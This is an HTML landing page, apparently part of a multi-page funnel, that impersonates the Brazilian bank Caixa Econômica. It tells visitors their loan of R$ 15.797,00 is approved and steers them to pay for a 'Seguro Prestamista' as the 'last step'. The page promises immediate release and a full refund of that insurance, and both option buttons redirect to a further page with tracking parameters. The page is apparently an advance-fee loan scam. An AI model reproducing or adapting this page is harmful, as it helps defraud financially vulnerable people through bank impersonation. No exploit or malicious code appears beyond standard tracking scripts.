﻿<!DOCTYPE html><html><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica - Empréstimo Facilitado</title>
    
     

<script src="../scripts/utms/latest-9.js" data-utmify-prevent-subids="" async="" defer=""></script>


    
    <link rel="stylesheet" href="css/zUVWAh7wJSWO.css">
</head>

<body>
    <div class="container">
        <div class="header">
            <div class="header" style="padding: 18px; display: flex; justify-content: center;">
                <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
            </div>

            <main>
                <h1>Última etapa para liberar seu empréstimo</h1>

                <div class="loan-value">
                    <p>Valor aprovado: <span class="value">R$ 15.797,00</span></p>
                </div>

                <div class="video-container">
                    <p class="volume-text">
                        <svg class="volume-icon" viewbox="0 0 24 24" width="24" height="24" stroke="currentColor" stroke-width="2" fill="none">
                            <path d="M11 5L6 9H2v6h4l5 4V5z"></path>

                            <path d="M15.54 8.46a5 5 0 0 1 0 7.07"></path>

                            <path d="M19.07 4.93a10 10 0 0 1 0 14.14"></path>
                        </svg>

                        Aumente o volume para assistir o vídeo
                    </p>

                    <div class="video-player">
                        <iframe src="https://player.vimeo.com/video/1050925411" frameborder="0" allow="autoplay; fullscreen"></iframe>
                    </div>
                </div>

                <div class="info-text" style="display: none;">
                    <p>Existe uma alternativa de empréstimo sem a necessidade de contratar um seguro prestamista: você pode optar pela alienação de um bem, como veículos ou imóveis. Para essa opção, será necessário agendar um atendimento presencial em uma de nossas unidades.</p>
                </div>

                <div class="options-container" style="display: none;">
                    <h2>Escolha uma das opções abaixo:</h2>

                    <div class="option-card">
                        <div class="option-header">
                            <svg class="shield-icon" viewbox="0 0 24 24" width="24" height="24" stroke="currentColor" stroke-width="2" fill="none">
                                <path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"></path>
                            </svg>

                            <div class="option-title">
                                <h3>Seguro Prestamista</h3>

                                <span class="recommended">Recomendado</span>
                            </div>
                        </div>

                        <ul class="benefits">
                            <li>✓ Liberação imediata do valor total</li>

                            <li>✓ Devolução 100% do valor do seguro</li>

                            <li>✓ Sem necessidade de avaliação presencial</li>
                        </ul>

                        <button class="select-button" onclick="redirectWithUTMs();">Selecionar</button>
                    </div>

                    <div class="option-card">
                        <div class="option-header">
                            <svg class="car-icon" viewbox="0 0 24 24" width="24" height="24" stroke="currentColor" stroke-width="2" fill="none">
                                <path d="M14 16H9m10 0h3v-3.15a1 1 0 00-.84-.99L16 11l-2.7-3.6a1 1 0 00-.8-.4H5.8a1 1 0 00-.8.4L2.3 11l-5.16.86a1 1 0 00-.84.99V16h3m10 0a3 3 0 116 0 3 3 0 01-6 0z"></path>

                                <circle cx="6" cy="16" r="3"></circle>

                                <circle cx="18" cy="16" r="3"></circle>
                            </svg>

                            <h3>Entregar Veículo ou Imóvel como garantia</h3>
                        </div>

                        <ul class="requirements">
                            <li>• Necessário avaliação presencial do bem</li>

                            <li>• Processo pode levar até 5 dias úteis</li>

                            <li>• Veículo ou imóvel como garantia</li>
                        </ul>

                        <button class="select-button" onclick="redirectWithUTMs();">Selecionar</button>
                    </div>
                </div>

                <footer>
                    <p>© Caixa Econômica - Todos os direitos reservados.</p>

                    <p>CNPJ: 09.694.966/0001-40</p>

                    <p>Política de Privacidade</p>
                </footer>
            </main>
        </div>

        <script src="js/GaFrv4XDFw4s.js"></script>
    </div>

    <script>
        function redirectWithUTMs() {
            window.location.href = '../page-11' + window.location.search;
        }
    </script>



</body><!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>